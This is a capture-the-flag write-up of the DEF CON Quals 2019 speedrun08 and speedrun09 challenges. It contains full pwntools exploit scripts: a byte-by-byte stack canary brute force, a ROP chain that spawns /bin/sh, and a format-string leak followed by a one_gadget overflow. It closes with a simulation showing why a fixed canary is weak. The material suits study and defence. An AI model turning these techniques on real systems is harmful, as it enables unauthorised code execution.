[Pwn] speedrun08-09

mf, xp0int, posted on May 20 2019

### Introduction

DefconQuals2019: I basically couldn't do the hard problems, so I did a couple of the easy ones, speedrun08 and speedrun09.

### speedrun08

Same as 04: follow the cross-references to find the main logic. There is an obvious stack overflow, but the binary has a stack canary, so it can't be hit directly.

Then we notice that init_array contains a function, sub_400B4D, which reads the flag and modifies the canary based on the flag's value. Testing shows that the canary depends only on the flag and is therefore fixed across runs.

We also notice that, once input is finished, the program prints "Peace out." at the end. So the canary can be brute-forced one byte at a time: if the program does not print the final "Peace out.", the guessed canary byte is wrong.

With the canary recovered, a ROP chain gets a shell.

### speedrun09

A very simple one: an obvious format string bug and an obvious stack overflow, and the binary is dynamically linked.

Leak what is needed with the format string bug, then use the stack overflow to jump to a one_gadget.

### Scripts

```python
from pwn import *
# speedrun08-helper
context.log_level = 'debug'
canary = '\x00'
# canary = '\x00\xc9\x50\x20\x31\x4a\x5c\x1e'


def main(p):
    p.recvuntil('Yes?\n')
    # Only the canary bytes guessed so far are overwritten; the rest keep
    # their original value, so a correct prefix is enough to survive.
    payload = cyclic(1032)
    payload += canary
    p.send(payload)
    p.recvline()
    p.recvline()  # a wrong canary byte aborts the process and this raises


while True:
    p = remote('speedrun-008.quals2019.oooverflow.io', 31337)
    try:
        main(p)
    except:
        # last byte was wrong: try the next value
        canary = canary[:-1] + chr(ord(canary[-1]) + 1)
    else:
        if len(canary) == 8:
            break
        # last byte confirmed: start guessing the next one
        canary = canary + '\x00'
    p.close()

print(hex(u64(canary.ljust(8, '\x00'))))
print('success!')
```

```python
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# speedrun08
from pwn import *
context.log_level = 'debug'
binary = './speedrun-008'
# p = process(binary)
p = remote('speedrun-008.quals2019.oooverflow.io', 31337)
canary = '\x00\xc9\x50\x20\x31\x4a\x5c\x1e'

poprax = 0x0000000000475907
poprdi = 0x0000000000400686
poprsi = 0x0000000000410253
poprdx = 0x0000000000449915
syscall = 0x0000000000474ec5
bss = 0x6BB91F

# read(0, bss, 100) to place "/bin/sh" in .bss, then execve(bss, 0, 0)
rop = [
    poprax, 0,
    poprdi, 0,
    poprsi, bss,
    poprdx, 100,
    syscall,
    poprax, 59,
    poprdi, bss,
    poprsi, 0,
    poprdx, 0,
    syscall,
]

payload = cyclic(1032) + canary + p64(0)
payload += ''.join(list(map(p64, rop)))
p.send(payload)
sleep(0.5)
p.sendline('/bin/sh\x00')
p.sendline('cat /flag\x00')
p.interactive()
```

```python
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# speedrun09
from pwn import *
context.log_level = 'debug'
binary = './speedrun-009'
lib64 = '/lib/x86_64-linux-gnu/libc-2.27.so'
# p = process(binary, env=env)
p = remote('speedrun-009.quals2019.oooverflow.io', 31337)
elf = ELF(binary)
libc = ELF(lib64)

# format string leak: canary, a libc address and a program address
p.send('2')
p.send('%163$lx:%169$lx:%165$lx')
p.recvuntil('Is that it "')
canary = int(p.recv(16), 16)
p.info('canary: %s' % hex(canary))
p.recv(1)
libc.address = int(p.recv(12), 16) - 138135
p.info('libc.address: %s' % hex(libc.address))
p.recv(1)
base = int(p.recv(12), 16) - 2732
p.info('base: %s' % hex(base))

# stack overflow: keep the canary intact and return into the one_gadget
p.send('1')
payload = cyclic(1032) + p64(canary) + p64(0) + p64(libc.address + 0x4f2c5)
p.send(payload)
p.send('3')
p.interactive()
```
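To make the security point of the speedrun08 section concrete (why a canary derived from the flag is a weak canary), here is an added Python 3 simulation; it is not part of the original writeup and does not reproduce the real binary. It models the "Peace out." oracle described above, runs the same byte-at-a-time loop as the helper script against a service whose canary is fixed, and then against one that picks a fresh random canary for every connection. The `Connection`, `FixedCanaryService` and `RandomCanaryService` classes, the flag-to-canary derivation and the 1032-byte buffer layout are constructed stand-ins; what sub_400B4D actually computes is not reproduced here.

```python
import hashlib
import secrets

CANARY_LEN = 8
BUF_LEN = 1032  # bytes in front of the canary in the vulnerable frame (from the writeup)


class Connection:
    """Observable behaviour of one connection (constructed model, not the real
    binary): bytes past BUF_LEN overwrite the canary from its low byte upward,
    and 'Peace out.' is printed only if every canary byte is still intact."""

    def __init__(self, canary: bytes):
        self._canary = canary

    def send(self, payload: bytes) -> str:
        overwrite = payload[BUF_LEN:BUF_LEN + CANARY_LEN]
        # Bytes that were not overwritten keep their original (correct) value,
        # so a partial overwrite only has to match the prefix it touched.
        if self._canary.startswith(overwrite):
            return "Peace out."
        return ""  # stack check failed: the process aborts and prints nothing


class FixedCanaryService:
    """Model of speedrun08's weakness: the canary is a function of the flag,
    so it is identical on every connection. The derivation below is a
    constructed stand-in, not what the real sub_400B4D does."""

    def __init__(self, flag: bytes):
        digest = hashlib.sha256(flag).digest()
        self.canary = b"\x00" + digest[:CANARY_LEN - 1]  # low byte 0, as glibc does

    def connect(self) -> Connection:
        return Connection(self.canary)


class RandomCanaryService:
    """Hardened stand-in: a fresh random canary for every connection, which
    is what a process gets when it is re-executed instead of forked."""

    def connect(self) -> Connection:
        return Connection(b"\x00" + secrets.token_bytes(CANARY_LEN - 1))


def recover_canary(service, budget: int = 1 + 7 * 256):
    """Byte-at-a-time recovery driven by the 'Peace out.' oracle (the same
    loop as the helper script). Returns (canary or None, connections used)."""
    known = b""
    attempts = 0
    while len(known) < CANARY_LEN:
        hit = None
        for guess in range(256):
            if attempts >= budget:
                return None, attempts
            attempts += 1
            conn = service.connect()
            if conn.send(b"A" * BUF_LEN + known + bytes([guess])) == "Peace out.":
                hit = guess
                break
        if hit is None:
            return None, attempts
        known += bytes([hit])
    return known, attempts


def accepted_by_fresh_connection(service, guess: bytes) -> bool:
    """Does a brand-new connection accept this full 8-byte canary?"""
    return service.connect().send(b"A" * BUF_LEN + guess) == "Peace out."


if __name__ == "__main__":
    fixed = FixedCanaryService(b"OOO{constructed-example-flag}")
    got, n = recover_canary(fixed)
    print("fixed canary recovered:", got == fixed.canary, "after", n, "connections")

    rnd = RandomCanaryService()
    got, n = recover_canary(rnd)
    ok = got is not None and accepted_by_fresh_connection(rnd, got)
    print("per-connection random canary: reusable result:", ok, "after", n, "connections")
```

Against the fixed-canary service the oracle needs at most 1 + 7 * 256 connections (the low byte is always zero) instead of 2^56 blind guesses. Against the per-connection random service the partial-overwrite trick still produces "hits" by chance, but nothing it collects is valid on the next connection, which is why a canary that is fixed across connections, whether inherited by forked children or derived from a secret as here, is the condition to look for in review.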